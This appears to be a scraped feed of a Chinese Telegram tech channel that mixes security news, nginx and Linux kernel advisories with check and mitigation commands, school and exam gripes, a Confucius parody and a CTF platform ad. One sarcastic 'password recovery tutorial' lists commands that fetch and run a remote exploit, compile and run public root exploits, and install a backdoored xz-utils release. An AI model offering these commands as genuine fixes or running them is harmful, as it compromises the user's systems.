<NullPointerException> 二周目

gogogo 出发咯

上海生化所 氰化物泄露

小朋友们你们好，我是 孙军 (Sun Jun) 我会在下个月准时入侵你的服务器帮你免费运维 记得给我五星好评哦 😈 #SunJun

面露难色的马斯克和老习vpn user

1. Linux 找回密码教程，建议收藏！ curl https://copy.fail/exp python3 && su passwd root 设置你的新密码 2. 你的 Linux 密码又忘了？ 没关系，这里还有一个新的！ git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp 3. 不想再忘记密码了？ 我们有专业的黑客团队帮您运维服务器和保管密码！ 项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1 sudo apt install xz-utils=5.6.1-1 sudo systemctl restart ssh 4. 容易忘记密码的有福了，每天都有新办法！ https://ze3tar.github.io/post-zcrx.html 插入一个支持ZCRX的高端网卡，让它down掉，然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可 5. 什么，你买不起高端网卡？那试试这个吧！ git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp 6. 听说您的机房不允许ssh外连，只能通过KVM物理访问服务器? 没关系，我们的专业黑客团队也可以通过nginx帮助运维您的服务器！ https://depthfirst.com/nginx-rift

快速自查:

# 1. 检查版本是否 >0.6.27, <1.30.1
nginx -v

# 2. 检查是否有 without-http_rewrite_module, 如果没有就算被影响

nginx -V 2>&1 | tr ' ' '\n' | grep -E 'rewrite|without-http_rewrite'

# 3. 遍历 nginx conf，查找所有可疑 rewrite

nginx -T 2>/dev/null | grep -nE '^[[:space:]]*rewrite[[:space:]]+[^[:space:]]+[[:space:]]+.*\$'

快速缓解: 1. 使用更加现代的 try_files 或 return 替代 rewrite 2. 增加缓解配置 (请根据业务调整):

http {
    # 缩小客户端请求头和 URI 的缓冲区大小
    client_header_buffer_size 1k;
    # 阻止攻击者发送超长 Payload
    large_client_header_buffers 2 4k; 
    
    # 其他配置...
}

Nginx 被发现一个存在18年的内存损坏漏洞，可导致远程代码执行，利用门槛低 漏洞存在于每个通用发行版都会包含的rewrite模块 ngx_http_rewrite_module ，影响开原版本Nginx 0.6.27至最近的1.30.0版本，在计算目标缓冲区大小时，使用的是原始字节长度，但在实际写入时，却进行了 URL 转义（ ⁠+⁠ , ⁠%⁠ , ⁠&⁠ 等字符会扩展为 3 倍长度），溢出长度可控导致堆喷射 建议用户尽快更新至 1.30.1 / 1.31.0 版本 Ref: https://depthfirst.com/nginx-rift

应该都升级得差不多了。新版 Telegram 支持了乱序投票，客户端渲染的顺序是随机的，而且现在也可以设置不允许撤回投票了。 请大家按自己的心情选择一个选项投票，看看最后的分布会是什么样的。 如果要转发请带来源，这样可以统计到一起。

5月9日，一名在北京做教培长达6年的博主“陶陶”说：我每年春天都会发现一件特别诡异的事：班里会突然“少掉”一批孩子。后来接触多了才知道——他们很多人，其实都挤在北京安定医院的休学门诊里。 你可能很难想象，北京初三的休学率，已经高到了什么程度。 有些海淀普校，39 个人的班，到了初三后半学期，真正天天来学校的只剩十几个；剩下的人里，明确因为抑郁、焦虑、躯体化而长期休学的，七八个都不夸张。 查看原文

我要给你塞聊天记录一张图和刻板印象了（） https://news.whu.edu.cn/info/1007/24981.htm

Dirty Frag: Universal Linux LPE 和 Copy Fail 类似，绝大多数发行版可一键提权 禁用 esp4、esp6、rxrpc 可以缓解

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

https://dirtyfrag.io/ https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/ exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c

学校逐渐变成幼儿园

前端直接传OSS未免有点太草台了

生物等级考出的啥玩意儿啊，几百个考点一个都不考，文字表述也是猎奇至极，题干反复读了五分钟没看懂，中文居然可以这样排列组合！句子主谓宾是不齐的，数据是否具有显著性差异是不标的，语文不好建议重修

上海物理等级考原题（） 我就说小学二年级得看

最近公司也遇到了TB级GHO备份文件的问题，在网上找到了一篇《2.8TB外贸数据生死救援》 得亏系统没格，不然也一样完蛋，顺便研究一下赛门铁克未公开的GHO文件结构 按某数据恢复工程师提供的思路，完成了对GHO文件的完整解析，具体的代码已发布： https://github.com/nyarime/gho GHO的压缩和解压共享着一个4096条的hash table，意味着每一步更新都必须精确同步，所以无法在系统里备份系统，只能在PE下备份扇区 顺带一提，现在Ghost跟VMware一样都是博通的了。

储氢材料是26届躲不开的梦魇

孔子：说说你们的规划吧。 子路：我将来一定要发 Nature Machine Intelligence + NeurIPS Oral，进清北计算机学院，四青拿遍，长江 + 杰青双料，最后当上院长兼智能计算国家重点实验室主任。 孔子：微笑。 冉有：我不求顶会，能发几篇 CCF-B、拿个省部级项目就行。进个普通一本或二本，年度考核能过，横向经费够养研究生。至于大模型、具身智能这些风口，我不追。 孔子：挺好。 公西华：我没什么大本事，就想当好一个实验室运维或科研助理：帮老师写本子、配环境、跑 baseline、整理开题答辩材料，评职称时帮大家统计引用数，开组会时分享屏幕、记会议纪要、顺手把服务器上的僵尸进程 kill 掉。 孔子：谦虚了。 曾晳：我的理想是去一个地级市的政务云运维岗，不用发论文，不用争架构师，每年春天跟几个同事带上孩子，去机房楼旁边的空地上放风筝、听听 UPS 风扇嗡嗡响、看看监控大屏上绿油油的在线率，然后一路哼着歌骑车回家，晚上摸出树莓派随便跑个小脚本，睡前看到终端输出一行 "done"，安心关上电脑。 孔子：你说的这个，正是我想要的！

广而告之：艺术品级别的，炸鱼级别的，用过都说好的，在西电 CTF 平台上扛过了好几届公众 CTF 挑战的 ret2shell 平台，开源了： https://github.com/ret2shell/ret2shell *Dev Group：https://t.me/ret2shell